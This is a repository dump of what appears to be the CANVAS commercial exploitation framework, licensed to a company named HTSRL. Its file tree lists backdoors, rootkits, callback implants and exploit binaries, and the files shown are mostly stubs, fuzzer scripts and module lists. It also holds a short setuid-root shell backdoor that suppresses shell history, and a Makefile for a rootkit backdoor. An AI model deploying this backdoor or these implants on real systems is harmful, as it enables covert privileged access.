└── CANVAS_HTSRL ├── libs ├── notes.html ├── yahoo │ ├── __init__.py │ └── search │ │ ├── version.py │ │ └── dom │ │ └── term.py ├── genshi │ ├── template │ │ ├── tests │ │ │ ├── templates │ │ │ │ ├── __init__.py │ │ │ │ ├── functions.html │ │ │ │ └── test.html │ │ │ ├── base.py │ │ │ └── __init__.py │ │ └── __init__.py │ ├── filters │ │ ├── __init__.py │ │ └── tests │ │ │ └── __init__.py │ ├── __init__.py │ └── tests │ │ └── __init__.py ├── pymsrpc │ ├── tests │ │ └── __init__.py │ ├── __init__.py │ ├── scripts │ │ ├── export_pida_from_idb.py │ │ ├── export_idl_from_idb.py │ │ └── midl_format_pointer_flags.py │ └── LICENSE.txt ├── Crypto │ ├── Cipher │ │ ├── Blowfish.py │ │ ├── DES3.py │ │ ├── RC4.py │ │ ├── AES.py │ │ └── __init__.py │ ├── Hash │ │ ├── SHA.py │ │ ├── MD5.py │ │ └── __init__.py │ ├── Util │ │ ├── __init__.py │ │ └── test │ │ │ └── prime_speed.py │ ├── LICENSE │ ├── Protocol │ │ └── __init__.py │ ├── PublicKey │ │ ├── __init__.py │ │ └── test │ │ │ └── rsa_speed.py │ ├── test │ │ ├── test_allornothing.py │ │ ├── test_rfc1751.py │ │ ├── test_hmac.py │ │ └── test_randpool.py │ ├── __init__.py │ └── test.py ├── pyPdf │ └── __init__.py ├── MS06_24 │ ├── immunity.wms │ └── actions.js.wmx ├── aixroot │ └── mosdef_reexec_52.a ├── pysnmp │ ├── __init__.py │ ├── error.py │ └── LICENSE ├── requestcache.html ├── topright.html ├── titleframe.html ├── Plex │ ├── test_tm.py │ ├── LICENSE.txt │ ├── Timing.py │ ├── __init__.py │ └── Errors.py ├── bottomright.html ├── notes.py ├── tlslite │ ├── utils │ │ ├── RC4.py │ │ ├── PyCrypto_RC4.py │ │ ├── PyCrypto_AES.py │ │ ├── OpenSSL_RC4.py │ │ ├── PyCrypto_TripleDES.py │ │ ├── TripleDES.py │ │ ├── __init__.py │ │ ├── Cryptlib_RC4.py │ │ ├── ASN1Parser.py │ │ ├── AES.py │ │ ├── Python_RC4.py │ │ ├── Cryptlib_AES.py │ │ ├── Cryptlib_TripleDES.py │ │ └── OpenSSL_TripleDES.py │ ├── integration │ │ └── __init__.py │ └── __init__.py ├── tftpy │ ├── __init__.py │ └── TftpPacketFactory.py ├── index.html ├── __init__.py ├── filesystem.py ├── left.html ├── targetrm.py ├── mysql_test.py ├── paramiko │ ├── compress.py │ └── logging22.py ├── dnslookup.py ├── searchAPI.py ├── output_spkproxy.py └── help.html ├── fuzzers ├── __init__.py ├── SPIKESCRIPTS │ ├── base64.spk │ ├── tftpd4.spk │ ├── tftpd3.spk │ ├── tftpd5.spk │ ├── tftpd2.spk │ ├── tftpd1.spk │ ├── imap_ntlm.spk │ └── tftpd6.spk └── dcefuzz_msdns.py ├── userdata ├── Resources ├── favmodules.txt ├── base.odb ├── blank.pdf ├── test2.pdf ├── icmp_proxy.exe ├── javanode.jar ├── ms07_066.exe ├── ms08_025.exe ├── ms08_049.exe ├── templates │ ├── template_cert.doc │ ├── template_cert.ppt │ └── template_cert.xls ├── newmodules.txt ├── vulnassess.txt ├── server.pkey ├── server.cert └── ifids.txt ├── MOSDEF ├── test.c ├── MOSDEFlibc │ ├── asm │ │ ├── Solaris │ │ │ └── __init__.py │ │ ├── Linux │ │ │ └── __init__.py │ │ └── __init__.py │ ├── OPENSTEP.py │ ├── NextSTEP.py │ ├── Mach.py │ ├── UnixSystemV.py │ ├── Darwin.py │ ├── SunOS.py │ ├── Win32.py │ ├── Rhapsody.py │ ├── ANSI.py │ ├── NetBSD.py │ ├── GNU.py │ ├── SVR4.py │ ├── OSF1.py │ ├── FreeBSD.py │ ├── BSD.py │ ├── POSIX.py │ └── IRIX.py ├── binfmt │ └── __init__.py ├── riscassembler.py ├── __init__.py ├── sparcscan.py ├── sparcparse.py ├── ppcscan.py ├── riscscan.py ├── il2risc.py ├── ppcparse.py ├── struct_endian.py └── solarisremoteresolver.py ├── NODELOVE ├── __init__.py ├── README.TXT ├── nasa_map.png └── ubuntu.sh ├── GETIFS2.exe ├── IPV6IFS.exe ├── tcpscan.exe ├── osdetection ├── osexception.py ├── __init__.py ├── language.py ├── telnet.py ├── local.py ├── ssh.py ├── sql.py └── mdns.py ├── sounds ├── hgn.ogg ├── welcome.ogg ├── __init__.py └── sound.cfg ├── extras ├── pop3d.py └── do_all_ips.py ├── upxtestvuln.exe ├── Reports └── header.gif ├── db ├── oui-stripped.gz ├── __init__.py └── oui.py ├── gui ├── pixmaps │ ├── canvas.gif │ ├── immunity.ico │ └── screen32.ico └── __init__.py ├── backdoors ├── mosdefservice.exe ├── mosdef_callbacks │ ├── mosdef_callback.exe │ ├── mosdef_callback_fbsd7 │ ├── mosdef_callback_fbsd_i386 │ ├── mosdef_callback_linux_i386 │ ├── mosdef_callback_aix51_powerpc │ ├── mosdef_callback_aix52_powerpc │ ├── mosdef_callback_linux_powerpc │ ├── mosdef_callback_macosx_intel │ ├── mosdef_callback_solaris_i386 │ ├── mosdef_callback_solaris_sparc │ ├── mosdef_callback_macosx_powerpc │ ├── utils.c │ └── utils.h ├── rootshell.c ├── php_callback.php ├── http_commander.py └── mosdef_escale_666.c ├── rootkits ├── windows │ ├── memdump.sys │ ├── mosdef.sys │ └── mosdef_usermode.exe └── linux │ ├── backdoor │ ├── immrtbkd │ ├── Makefile │ └── md5.h │ ├── immrt │ └── docs │ └── USAGE ├── Documentation ├── CANVAS_Basics.pdf ├── Debian_install.txt └── macosinstall.txt ├── ExploitTypes └── __init__.py ├── canvastimer.py ├── 3rdparty └── README.txt ├── internal ├── colors.py ├── uniqlist.py ├── logging.py ├── portability.py ├── path.py ├── PySystemAPI.py └── __init__.py ├── shellcode ├── clean │ ├── __init__.py │ └── windows │ │ └── __init__.py ├── __init__.py ├── ppcShellcodeGenerator.py └── sparcShellcodeGenerator.py ├── Nodes ├── __init__.py ├── NodeUtils.py └── JavaShellServer.py ├── canvas.css ├── engine ├── __init__.py └── fWrap.py ├── canvaserror.py ├── encoder └── __init__.py ├── alx_memprofiler.py ├── JavaNode.py ├── vsrun.bat ├── servcert.cer ├── runcanvas.py ├── VFSNode.py ├── canvashost.py ├── runcanvas.sh ├── MOSDEFShellServer ├── __init__.py └── MSSgeneric.py ├── canvas.bat ├── exploits ├── exitthread │ └── exitthread.py ├── exitprocess │ └── exitprocess.py ├── remark_in_log │ └── remark_in_log.py ├── drinkcoaster │ └── drinkcoaster.py ├── tftp_fuzzer │ └── tftp_fuzzer.py ├── dir │ └── dir.py ├── unlink │ └── unlink.py ├── LogonUser │ └── LogonUser.py └── get_dnscache │ └── get_dnscache.py ├── SQLNode.py ├── ScriptShellServer.py └── bin2root.sh /CANVAS_HTSRL/libs/notes.html: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/yahoo/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/fuzzers/__init__.py: -------------------------------------------------------------------------------- 1 | all = ["spike"] 2 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/genshi/template/tests/templates/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/pymsrpc/tests/__init__.py: -------------------------------------------------------------------------------- 1 | __all__=["debug"] -------------------------------------------------------------------------------- /CANVAS_HTSRL/userdata: -------------------------------------------------------------------------------- 1 | 09/23/2009 2 | vale@hackingteam.it 3 | HTSRL 4 | 5 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/Resources/favmodules.txt: -------------------------------------------------------------------------------- 1 | ms08_067 2 | roundcube 3 | msparsing_xml 4 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/test.c: -------------------------------------------------------------------------------- 1 | int main(void) 2 | { 3 | int i; 4 | i=8; 5 | } 6 | 7 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/pymsrpc/__init__.py: -------------------------------------------------------------------------------- 1 | __all__=[ 2 | "parse", 3 | "ndr", 4 | ] 5 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/NODELOVE/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | __all__ = ['canvasgraph'] 4 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/Crypto/Cipher/Blowfish.py: -------------------------------------------------------------------------------- 1 | MODE_CBC=2 2 | class Blowfish(object): 3 | pass 4 | 5 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/GETIFS2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/GETIFS2.exe -------------------------------------------------------------------------------- /CANVAS_HTSRL/IPV6IFS.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/IPV6IFS.exe -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/Crypto/Cipher/DES3.py: -------------------------------------------------------------------------------- 1 | #placeholder 2 | MODE_CBC=2 3 | class DES3(object): 4 | pass 5 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/pyPdf/__init__.py: -------------------------------------------------------------------------------- 1 | from pdf import PdfFileReader, PdfFileWriter 2 | __all__ = ["pdf"] 3 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/tcpscan.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/tcpscan.exe -------------------------------------------------------------------------------- /CANVAS_HTSRL/osdetection/osexception.py: -------------------------------------------------------------------------------- 1 | # OS Exception handler 2 | 3 | class OSException(Exception): 4 | pass -------------------------------------------------------------------------------- /CANVAS_HTSRL/sounds/hgn.ogg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/sounds/hgn.ogg -------------------------------------------------------------------------------- /CANVAS_HTSRL/extras/pop3d.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/extras/pop3d.py -------------------------------------------------------------------------------- /CANVAS_HTSRL/upxtestvuln.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/upxtestvuln.exe -------------------------------------------------------------------------------- /CANVAS_HTSRL/NODELOVE/README.TXT: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/NODELOVE/README.TXT -------------------------------------------------------------------------------- /CANVAS_HTSRL/Reports/header.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/Reports/header.gif -------------------------------------------------------------------------------- /CANVAS_HTSRL/Resources/base.odb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/Resources/base.odb -------------------------------------------------------------------------------- /CANVAS_HTSRL/Resources/blank.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/Resources/blank.pdf -------------------------------------------------------------------------------- /CANVAS_HTSRL/Resources/test2.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/Resources/test2.pdf -------------------------------------------------------------------------------- /CANVAS_HTSRL/db/oui-stripped.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/db/oui-stripped.gz -------------------------------------------------------------------------------- /CANVAS_HTSRL/sounds/welcome.ogg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/sounds/welcome.ogg -------------------------------------------------------------------------------- /CANVAS_HTSRL/NODELOVE/nasa_map.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/NODELOVE/nasa_map.png -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/MOSDEFlibc/asm/Solaris/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | __all__ = [ 4 | 'i386', 5 | ] 6 | 7 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/binfmt/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | __all__ = [ 4 | 'elf', 5 | 'elf_const', 6 | ] 7 | 8 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/Resources/icmp_proxy.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/Resources/icmp_proxy.exe -------------------------------------------------------------------------------- /CANVAS_HTSRL/Resources/javanode.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/Resources/javanode.jar -------------------------------------------------------------------------------- /CANVAS_HTSRL/Resources/ms07_066.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/Resources/ms07_066.exe -------------------------------------------------------------------------------- /CANVAS_HTSRL/Resources/ms08_025.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/Resources/ms08_025.exe -------------------------------------------------------------------------------- /CANVAS_HTSRL/Resources/ms08_049.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/Resources/ms08_049.exe -------------------------------------------------------------------------------- /CANVAS_HTSRL/gui/pixmaps/canvas.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/gui/pixmaps/canvas.gif -------------------------------------------------------------------------------- /CANVAS_HTSRL/gui/pixmaps/immunity.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/gui/pixmaps/immunity.ico -------------------------------------------------------------------------------- /CANVAS_HTSRL/gui/pixmaps/screen32.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/gui/pixmaps/screen32.ico -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/MS06_24/immunity.wms: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/libs/MS06_24/immunity.wms -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/MOSDEFlibc/asm/Linux/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | __all__ = [ 4 | 'i386', 5 | 'ppc', 6 | ] 7 | 8 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/MOSDEFlibc/asm/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | __all__ = [ 4 | 'Linux', 5 | 'Solaris', 6 | ] 7 | 8 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/backdoors/mosdefservice.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/backdoors/mosdefservice.exe -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/MS06_24/actions.js.wmx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/libs/MS06_24/actions.js.wmx -------------------------------------------------------------------------------- /CANVAS_HTSRL/rootkits/windows/memdump.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/rootkits/windows/memdump.sys -------------------------------------------------------------------------------- /CANVAS_HTSRL/rootkits/windows/mosdef.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/rootkits/windows/mosdef.sys -------------------------------------------------------------------------------- /CANVAS_HTSRL/Documentation/CANVAS_Basics.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/Documentation/CANVAS_Basics.pdf -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/aixroot/mosdef_reexec_52.a: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/libs/aixroot/mosdef_reexec_52.a -------------------------------------------------------------------------------- /CANVAS_HTSRL/rootkits/linux/backdoor/immrtbkd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/rootkits/linux/backdoor/immrtbkd -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/Crypto/Cipher/RC4.py: -------------------------------------------------------------------------------- 1 | #we simply import from the pure-python implementation of RC4 2 | from libs.tlslite.utils.Python_RC4 import * 3 | 4 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/rootkits/windows/mosdef_usermode.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/rootkits/windows/mosdef_usermode.exe -------------------------------------------------------------------------------- /CANVAS_HTSRL/Documentation/Debian_install.txt: -------------------------------------------------------------------------------- 1 | 2 | - Debian, Gentoo, Ubuntu: 3 | 4 | $ sudo apt-get -qy install python2.4 python2.4-gtk2 python2.4-glade2 5 | 6 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/Resources/templates/template_cert.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/Resources/templates/template_cert.doc -------------------------------------------------------------------------------- /CANVAS_HTSRL/Resources/templates/template_cert.ppt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/Resources/templates/template_cert.ppt -------------------------------------------------------------------------------- /CANVAS_HTSRL/Resources/templates/template_cert.xls: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/Resources/templates/template_cert.xls -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/Crypto/Cipher/AES.py: -------------------------------------------------------------------------------- 1 | #we simply import from the pure-python implementation of AES 2 | MODE_CBC=2 3 | from libs.tlslite.utils.Python_AES import * 4 | 5 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/backdoors/mosdef_callbacks/mosdef_callback.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/backdoors/mosdef_callbacks/mosdef_callback.exe -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/genshi/template/tests/templates/functions.html: -------------------------------------------------------------------------------- 1 |
2 | ${defined('foo')} 3 | ${value_of('foo', 'bar')} 4 | ${XML(snippet)} 5 | ${HTML(snippet)} 6 |
7 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/Resources/newmodules.txt: -------------------------------------------------------------------------------- 1 | ms08_068 2 | msparsing_xml 3 | roundcube 4 | icmpsweep 5 | arpscan 6 | arpscanner 7 | udpportscan 8 | ipheuristic 9 | ipfingerprint 10 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/backdoors/mosdef_callbacks/mosdef_callback_fbsd7: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/backdoors/mosdef_callbacks/mosdef_callback_fbsd7 -------------------------------------------------------------------------------- /CANVAS_HTSRL/NODELOVE/ubuntu.sh: -------------------------------------------------------------------------------- 1 | wget -c http://www.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz 2 | gunzip GeoLiteCity.dat.gz 3 | #ubuntu 4 | apt-get install python-geoip 5 | 6 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/backdoors/mosdef_callbacks/mosdef_callback_fbsd_i386: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/backdoors/mosdef_callbacks/mosdef_callback_fbsd_i386 -------------------------------------------------------------------------------- /CANVAS_HTSRL/backdoors/mosdef_callbacks/mosdef_callback_linux_i386: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/backdoors/mosdef_callbacks/mosdef_callback_linux_i386 -------------------------------------------------------------------------------- /CANVAS_HTSRL/backdoors/mosdef_callbacks/mosdef_callback_aix51_powerpc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/backdoors/mosdef_callbacks/mosdef_callback_aix51_powerpc -------------------------------------------------------------------------------- /CANVAS_HTSRL/backdoors/mosdef_callbacks/mosdef_callback_aix52_powerpc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/backdoors/mosdef_callbacks/mosdef_callback_aix52_powerpc -------------------------------------------------------------------------------- /CANVAS_HTSRL/backdoors/mosdef_callbacks/mosdef_callback_linux_powerpc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/backdoors/mosdef_callbacks/mosdef_callback_linux_powerpc -------------------------------------------------------------------------------- /CANVAS_HTSRL/backdoors/mosdef_callbacks/mosdef_callback_macosx_intel: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/backdoors/mosdef_callbacks/mosdef_callback_macosx_intel -------------------------------------------------------------------------------- /CANVAS_HTSRL/backdoors/mosdef_callbacks/mosdef_callback_solaris_i386: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/backdoors/mosdef_callbacks/mosdef_callback_solaris_i386 -------------------------------------------------------------------------------- /CANVAS_HTSRL/backdoors/mosdef_callbacks/mosdef_callback_solaris_sparc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/backdoors/mosdef_callbacks/mosdef_callback_solaris_sparc -------------------------------------------------------------------------------- /CANVAS_HTSRL/backdoors/mosdef_callbacks/mosdef_callback_macosx_powerpc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/Canvas/master/CANVAS_HTSRL/backdoors/mosdef_callbacks/mosdef_callback_macosx_powerpc -------------------------------------------------------------------------------- /CANVAS_HTSRL/ExploitTypes/__init__.py: -------------------------------------------------------------------------------- 1 | all = [ "ftpexploit", 2 | "CommandLineExecuter", 3 | "blindStack.py", 4 | "svcctlexploit.py", 5 | "phpexploit" 6 | ] 7 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/fuzzers/SPIKESCRIPTS/base64.spk: -------------------------------------------------------------------------------- 1 | spk.s_string_variable("AAAA") 2 | spk.s_string("\r\n") 3 | spk.s_string_variable("BBBB") 4 | spk.s_string("\r\n") 5 | spk.s_string_variable("BB==") 6 | spk.s_string("\r\n") -------------------------------------------------------------------------------- /CANVAS_HTSRL/rootkits/linux/backdoor/Makefile: -------------------------------------------------------------------------------- 1 | 2 | all: 3 | gcc -o immrtbkd immbkd.c md5.c 4 | strip immrtbkd 5 | debug: 6 | gcc -o immrtbkd immbkd.c md5.c -ggdb -Wall -DDEBUG 7 | clean: 8 | rm -rf immrtbkd 9 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/MOSDEFlibc/OPENSTEP.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | from NextSTEP import NextSTEP 4 | 5 | class OPENSTEP(NextSTEP): 6 | 7 | def __init__(self, *args): 8 | NextSTEP.__init__(self) 9 | 10 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/fuzzers/SPIKESCRIPTS/tftpd4.spk: -------------------------------------------------------------------------------- 1 | #Fuzzer for fuzzing tftp 2 | 3 | #0x04 is Ack: could be a variable here to fuzz other opcodes 4 | spk.s_int(0x04, "BIGENDIANHALFWORD") #ack 5 | spk.s_int_variable(0x04, "BIGENDIANHALFWORD") #block number 6 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/canvastimer.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # CANVAS TIMER 3 | # 4 | # Perform all kind of time/date operations 5 | # 6 | 7 | import time 8 | import datetime 9 | 10 | def CurrentTime(): 11 | return time.strftime("%I:%M:%S %p") 12 | 13 | # EOF -------------------------------------------------------------------------------- /CANVAS_HTSRL/fuzzers/SPIKESCRIPTS/tftpd3.spk: -------------------------------------------------------------------------------- 1 | #Fuzzer for fuzzing tftp 2 | 3 | #0x03 is Dat : could be a variable here to fuzz other opcodes 4 | spk.s_int(0x03, "BIGENDIANHALFWORD") 5 | spk.s_int(0x04, "BIGENDIANHALFWORD") #block number 6 | spk.s_string_variable("Hello.txt") # n bytes of data 7 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/fuzzers/SPIKESCRIPTS/tftpd5.spk: -------------------------------------------------------------------------------- 1 | #Fuzzer for fuzzing tftp 2 | 3 | #0x05 is Err: could be a variable here to fuzz other opcodes 4 | spk.s_int(0x05, "BIGENDIANHALFWORD") 5 | spk.s_int(0x04, "BIGENDIANHALFWORD") 6 | spk.s_string_variable("Error Message") #filename 7 | spk.s_binary("00") 8 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/Resources/vulnassess.txt: -------------------------------------------------------------------------------- 1 | mssql_auth 2 | dcedump 3 | rpcdump 4 | find_null_vnc 5 | oraclegetuser 6 | oraclegetinfo 7 | oraclegetpwd 8 | mssqlresolve 9 | userenum 10 | shareenum 11 | ftpd_check 12 | gethostbyname 13 | getprintproviders 14 | getremotelanguage 15 | icmpsweep 16 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/osdetection/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | __all__ = [ 4 | 'ftp', 5 | 'language', 6 | 'rpc', 7 | 'smb', 8 | 'servicepack', 9 | 'smtp', 10 | 'telnet', 11 | 'ssh', 12 | 'http', 13 | 'sql', 14 | 'local', 15 | 'mdns', 16 | 'osexception' 17 | ] 18 | 19 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/3rdparty/README.txt: -------------------------------------------------------------------------------- 1 | CANVAS Professional 6.31 or later have support for modular third party exploit packs. If you have acquired an exploit pack, just uncompress it into this directory, and it should become available for use next time you start CANVAS. 2 | 3 | For more information, see Documentation/CANVAS_ExploitPacks.txt. 4 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/sounds/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | __all__ = ['sound'] 9 | 10 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/db/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | __all__ = ['oui', 'UserAgent'] 9 | 10 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/MOSDEFlibc/NextSTEP.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | from UNIX import UNIX 4 | from BSD import BSD43 5 | from SVR4 import SVR4 6 | 7 | class NextSTEP(SVR4, BSD43, UNIX): 8 | 9 | def __init__(self, *args): 10 | UNIX.__init__(self) 11 | BSD43.__init__(self) 12 | SVR4.__init__(self) 13 | 14 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/Crypto/Hash/SHA.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | # Just use the SHA module from the Python standard library 4 | 5 | __revision__ = "$Id: SHA.py,v 1.2 2006/07/29 02:52:49 phil Exp $" 6 | 7 | from sha import * 8 | import sha 9 | if hasattr(sha, 'digestsize'): 10 | digest_size = digestsize 11 | del digestsize 12 | del sha 13 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/backdoors/rootshell.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int 5 | main(void) { 6 | char *shell[2]; 7 | char *env[2]; 8 | 9 | shell[0] = "/bin/sh"; 10 | shell[1] = NULL; 11 | env[0] = "HISTFILE=/dev/null"; 12 | env[1] = NULL; 13 | 14 | setuid(0); 15 | setgid(0); 16 | 17 | return execve(shell[0], shell, env); 18 | } 19 | 20 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/internal/colors.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | # ANSI colors (for ANSI terminal) (ISO 6429) 4 | 5 | EOC = "\033[0m" 6 | BRIGHT = "\033[1m" 7 | BROWN = "\033[0;33m" 8 | RED = "\033[1;31m" 9 | GREEN = "\033[1;32m" 10 | YELLOW = "\033[1;33m" 11 | CYAN = "\033[1;34m" 12 | MAGENTA = "\033[1;35m" 13 | BLUE = "\033[1;36m" 14 | 15 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/Crypto/Hash/MD5.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | # Just use the MD5 module from the Python standard library 4 | 5 | __revision__ = "$Id: MD5.py,v 1.2 2006/07/29 02:52:49 phil Exp $" 6 | 7 | from md5 import * 8 | 9 | import md5 10 | if hasattr(md5, 'digestsize'): 11 | digest_size = digestsize 12 | del digestsize 13 | del md5 14 | 15 | 